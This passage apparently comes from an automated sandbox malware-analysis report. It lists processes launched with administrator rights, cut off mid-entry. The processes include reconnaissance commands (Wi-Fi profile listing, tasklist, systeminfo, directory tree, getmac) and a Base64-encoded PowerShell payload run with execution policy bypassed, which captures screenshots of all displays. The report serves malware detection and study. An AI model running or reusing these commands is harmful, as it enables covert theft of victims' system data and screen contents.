                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:05:00:09
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:05:00:09
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:05:00:09
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:netsh wlan show profile
                                                                                                                                                                                                                                              Imagebase:0x7ff6c9530000
                                                                                                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:05:00:09
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff6d1120000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                                                                                              Imagebase:0x7ff7cab30000
                                                                                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                              Start time:05:00:11
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                              Start time:05:00:12
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                              Start time:05:00:12
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                              Start time:05:00:13
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                              Start time:05:00:13
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                              Start time:05:00:14
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                              Start time:05:00:14
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff6bec80000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                              Start time:05:00:15
                                                                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                              Imagebase:0x7ff7546d0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                              Start time:05:00:15
